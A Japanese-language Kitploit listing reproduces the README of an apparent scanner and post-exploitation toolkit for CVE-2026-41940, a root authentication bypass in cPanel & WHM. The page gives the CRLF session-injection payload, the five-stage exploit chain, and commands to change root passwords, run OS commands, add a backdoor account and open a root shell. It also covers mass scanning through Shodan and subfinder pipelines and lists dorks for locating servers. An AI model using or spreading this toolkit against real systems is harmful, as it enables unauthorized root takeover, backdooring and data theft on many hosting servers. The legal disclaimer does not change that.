Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Automated-scanner-CVE-2026-41940 — CVE-2026-41940用の自動スキャナー&ポストエクスプロイテーションツールキット — cPanel & WHMのルート認証バイパス(session-file CRLF injection経由) | Kitploit
ツール/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
認証と認可偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
レッドチーミング
ペイロード開発
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

CVE-2026-41940用の自動スキャナー&ポストエクスプロイテーションツールキット — cPanel & WHMのルート認証バイパス(session-file CRLF injection経由)

リポジトリを見る
163ヶ月前未レビュー

CPANEL CVE EXPLOIT

English | فارسی (Persian)

root@kitploit:~
 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

CVE-2026-41940 のための自動スキャナー&ポストエクスプロイトツールキット — セッションファイルの CRLF インジェクションによる cPanel & WHM の root 認証バイパス。


目次

  • 概要
  • CVE 詳細
  • 動作原理
  • 機能
  • 影響を受けるバージョン
  • 必要条件
  • インストール
  • クイックスタート
  • 使用方法
  • ポストエクスプロイトアクション
  • インタラクティブ WHM シェル
  • 大量スキャン&パイプライン統合
  • Shodan ダーク
  • 出力形式
  • セッション例
  • 法的免責事項

概要

CPANEL CVE EXPLOIT は、CVE-2026-41940 に脆弱な cPanel & WHM サーバーに対する認定セキュリティ評価のために設計された単一ファイルの Python ツールです。

この脆弱性により、リモートの認証されていない攻撃者が Authorization: Basic ヘッダーに CRLF インジェクションを仕掛けて WHM セッションファイルを汚染し、認証をバイパスして正規の資格情報なしにルートレベルの WHM アクセスを取得できます。


CVE 詳細

根本原因

脆弱なバージョンの cPanel & WHM では、Session.pm 内の saveSession() がセッションファイルをディスクに書き込んだ後に filter_sessiondata() を呼び出します。攻撃者は HTTP Authorization: Basic ヘッダーを介して CRLF(\r\n)文字を注入でき、それらがディスク上のセッションファイルに直接書き込まれ、サニタイズがバイパスされます。

注入されるセッションフィールド

このツールは、Base64 エンコードされたペイロードを使用します。これをデコードすると次のようになります。

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

これらのフィールドは、完全に認証されたルート WHM セッションをシミュレートし、2FA バイパス(tfa_verified=1)とルート権限フラグ(hasroot=1)を含みます。

修正

cPanel は filter_sessiondata() を Session.pm のセッション書き込み操作の前に実行するように変更しました。


動作原理

エクスプロイトチェーンは 5 段階(ステージ 0~4)で構成されます。

root@kitploit:~
flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]

機能


影響を受けるバージョン

注: パッチが適用されたビルドを実行しているターゲットは、スキャン中に自動的にフラグが付けられ、スキップされます。


必要条件

コア(必須)

  • Python 3.8+
  • 外部パッケージは不要 — Python 標準ライブラリのみを使用

オプション

パッケージ目的
seleniumブラウザ自動ログイン (--selenium)
Chrome / FirefoxSelenium 用ブラウザエンジン
root@kitploit:~
pip install -r requirements.txt   # オプション — selenium のみ

インストール

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

ビルド手順は不要です。直接実行します。

root@kitploit:~
python3 test-cve.py --help

クイックスタート

root@kitploit:~
# 単一の WHM ターゲットをスキャン
python3 test-cve.py -u https://target.com:2087

# ポストエクスプロイトでスキャン:すべての cPanel アカウントを一覧表示
python3 test-cve.py -u https://target.com:2087 --action list

# ファイルから大量スキャン、20 スレッド、JSON レポートを保存
python3 test-cve.py -l targets.txt -t 20 -o results.json

使用方法

root@kitploit:~
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

ターゲットオプション

フラグ説明
-u, --url単一ターゲット URL(例: https://host:2087)

スキャンオプション

出力オプション

フラグ説明
-o, --output発見事項を JSON ファイルに保存
--no-colorANSI カラー出力を無効化

ポストエクスプロイトアクション

ポストエクスプロイトフラグは単一ターゲットのみで動作します(-u、大量スキャンでは不可)。

例

root@kitploit:~
# バイパス後に root パスワードを変更
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'

# リモートコマンドを実行
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"

# バックドア cPanel アカウントを作成
python3 test-cve.py -u https://target.com:2087 \
  --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'

# インタラクティブ WHM シェルを開く
python3 test-cve.py -u https://target.com:2087 --action shell

# Chrome 経由で自動ログイン
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome

# 手動ブラウザログイン(DevTools コンソール用 JS を表示)
python3 test-cve.py -u https://target.com:2087 --browser

インタラクティブ WHM シェル

--action shell で起動すると、完全なインタラクティブセッションが利用できます。

root@kitploit:~
[email protected] ▶ help

  id / whoami / hostname / version  → サーバー情報
  ls [path]                         → ファイル一覧
  cat [path]                        → ファイル内容の読み取り
  accounts                          → cPanel アカウント一覧
  addadmin <user> <pass>            → WHM 管理者/リセラーを作成
  passwd <newpass>                  → root パスワードを変更
  exec <command>                    → OS コマンドを実行
  exit / quit                       → シェルを終了

例:

root@kitploit:~
[email protected] ▶ id
  uid=0(root) gid=0(root) groups=0(root)

[email protected] ▶ accounts
  user=webuser1          domain=example.com          [email protected]
  user=webuser2          domain=test.com             [email protected]

[email protected] ▶ cat /etc/passwd

[email protected] ▶ exit

大量スキャン&パイプライン統合

ファイルから

root@kitploit:~
python3 test-cve.py -l targets.txt -t 20 -o results.json

標準入力から(パイプ)

root@kitploit:~
cat urls.txt | python3 test-cve.py

# subfinder + httpx パイプライン
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30

# Shodan パイプライン
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json

サポートされている入力形式

形式例
完全な URLhttps://192.168.1.1:2087
IP + ポート192.168.1.1 2087
Shodan 出力正規表現で自動解析
ANSI カラー出力自動的に除去

Shodan ダーク

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM"
ssl:"cpanel" port:2087

出力形式

発見事項は、-o results.json を使用すると JSON で保存されます。

root@kitploit:~
{
  "scanner": "cPanelSniper v2.0",
  "cve": "CVE-2026-41940",
  "timestamp": "2026-05-23T12:00:00.000000",
  "findings": [
    {
      "severity": "CRIT",
      "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass",
      "target": "https://target.com:2087",
      "canonical": "server.target.com",
      "session": "root:SessionName",
      "token": "/cpsess1234567890",
      "version": "11.126.0.50",
      "api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
      "evidence": "{\"version\":\"11.126.0.50\"...}",
      "cve": "CVE-2026-41940",
      "cvss": "10.0",
      "timestamp": "2026-05-23T12:00:05.000000"
    }
  ]
}

コンソールサマリー

root@kitploit:~
══════════════════════════════════════════════════════════════════════
  cPanelSniper — CVE-2026-41940 スキャン完了
  時間: 12.4s  ·  ターゲット数: 50
──────────────────────────────────────────────────────────────────────

  ⚡ 2 件の脆弱なターゲット

  ターゲット : https://victim1.com:2087
  バージョン : 11.126.0.50
  トークン   : /cpsess1234567890
  API URL    : https://victim1.com:2087/cpsess1234567890/json-api/version
  証拠       : {"version":"11.126.0.50"...}

══════════════════════════════════════════════════════════════════════

セッション例

root@kitploit:~
$ python3 test-cve.py -u https://target.com:2087

  設定:
   ターゲット : 1
   スレッド   : 10
   タイムアウト : 15s
   アクション : スキャンのみ

12:00:01 [INFO] 正規ホスト名を検出: server.target.com
12:00:02 [  OK] ステージ1: プリオースセッション = root:abc123...
12:00:03 [  OK] ステージ2: HTTP 307 → トークン=/cpsess1234567890
12:00:04 [  OK] ステージ3: HTTP 401 — do_token_denied ガジェット発動
12:00:05 [INFO] ステージ4: HTTP 200  {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 確認 — WHM ルートアクセス! (v11.126.0.50 — 脆弱性確認済み)
12:00:05 [PWND]   トークン    : /cpsess1234567890
12:00:05 [PWND]   セッション  : root:abc123...
12:00:05 [PWND]   バージョン  : 11.126.0.50
12:00:05 [PWND]   API URL    : https://target.com:2087/cpsess1234567890/json-api/version

プロジェクト構成

root@kitploit:~
cpanel-cve-exploit/
├── test-cve.py        # メインスキャナー&エクスプロイトツール(単一ファイル)
├── requirements.txt   # オプション: selenium
├── README.md          # 英語ドキュメント
└── README.fa.md       # ペルシア語ドキュメント (فارسی)

法的免責事項

許可されたセキュリティテスト専用

このツールは教育および許可されたペネトレーションテストの目的でのみ提供されます。

  • 自分が所有するシステム、またはテストする明示的な書面による許可があるシステムに対してのみ使用してください。
  • コンピュータシステムへの不正アクセスは、米国の CFAA、英国の Computer Misuse Act、および世界各国の同等の法律に基づき違法です。
  • CVE-2026-41940 の野外での悪用が確認されています — 影響を受けるシステムは直ちにパッチを適用してください。
  • 著者および貢献者は、本ソフトウェアの誤用に対する一切の責任を負いません。

本ツールを使用することにより、責任を持って、かつすべての適用法に準拠して使用することに同意したものとみなされます。


参考文献

  • CVE-2026-41940 — NVD エントリ
  • cPanel セキュリティ勧告 — Session.pm CRLF インジェクションパッチ
  • WHM デフォルトポート: 2087 (HTTPS)

セキュリティ研究者のために構築されました · 責任を持って使用してください

ツールをダウンロード
プロパティ値
CVECVE-2026-41940
深刻度クリティカル
CVSS10.0
攻撃ベクトルネットワーク / 認証不要
影響完全な WHM ルートアクセス
デフォルトポート2087 (WHM)
状況野外での悪用が確認済み (2026年4月)
ステージエンドポイント目的
0/openid_connect/cpanelid307 リダイレクトによる正規ホスト名の自動検出
1/login/?login_only=1間違った資格情報でプリオース whostmgrsession Cookie を取得
2/CRLF で汚染された Authorization: Basic ヘッダーをセッションファイルに注入
3/scripts2/listacctsdo_token_denied ガジェットをトリガーし、セッションをキャッシュにフラッシュ
4/{token}/json-api/versionルートアクセスを確認 — HTTP 200 + バージョン JSON
機能説明
単一ターゲットスキャン1 つの WHM URL に対する完全なエクスプロイトチェーン
大量スキャンファイルまたは標準入力からのマルチスレッドスキャン
バージョン検出パッチ適用済み/脆弱バージョンの自動比較
ポストエクスプロイト APIパスワード変更、コマンド実行、アカウント一覧、ユーザー作成
インタラクティブシェルファイル読み取りと API コマンドを備えた組み込み WHM ルートシェル
Selenium ログインChrome/Firefox にセッション Cookie を自動注入
手動ブラウザフォールバック手動 WHM ログインのためのコンソール JavaScript スニペット
RCE チェックバイパス後の迅速な id / uname -a 確認
JSON エクスポートすべての発見事項を構造化 JSON レポートに保存
パイプライン対応httpx、subfinder、shodan、awk パイプラインで動作
Stdlib のみコア機能に pip 依存関係は不要
カラー出力リアルタイムのステージログと重大度インジケーター
ブランチパッチ適用バージョン状況
11.110.x11.110.0.97パッチ未満は脆弱
11.118.x11.118.0.63パッチ未満は脆弱
11.126.x11.126.0.54パッチ未満は脆弱
11.132.x11.132.0.29パッチ未満は脆弱
11.134.x11.134.0.20パッチ未満は脆弱
11.136.x11.136.0.5パッチ未満は脆弱
-l, --listURL を 1 行に 1 つずつ含むファイル
--hostname正規の Host ヘッダーを上書き(デフォルトでは自動検出)
フラグデフォルト説明
-t, --threads10同時スキャンスレッド数
--timeout15HTTP タイムアウト(秒)
--rate-limit0ターゲット送信間の遅延(秒)
アクションフラグ説明
スキャンのみ(デフォルト)エクスプロイトチェーンを実行し、脆弱性を報告
アカウント一覧--action listWHM API 経由ですべての cPanel アカウントを一覧表示
パスワード変更--action passwd --passwd <pass>root WHM パスワードを変更
コマンド実行--action cmd --cmd "id;whoami"WHM exec API 経由で OS コマンドを実行
サーバー情報--action infoホスト名、負荷、ディスク、バージョンを収集
バージョン取得--action versionAPI 経由で cPanel/WHM バージョンを取得
アカウント作成--action adduser --new-user u --new-domain d.com --passwd p新しい cPanel アカウントを作成
インタラクティブシェル--action shellインタラクティブ WHM ルートシェルを起動
RCE チェック--check-rceバイパス成功後に id;uname -a を実行
Selenium ログイン--selenium [--engine chrome|firefox]ブラウザで WHM ダッシュボードに自動ログイン
手動ブラウザ--browser手動ログイン用の JavaScript コンソールコマンドを表示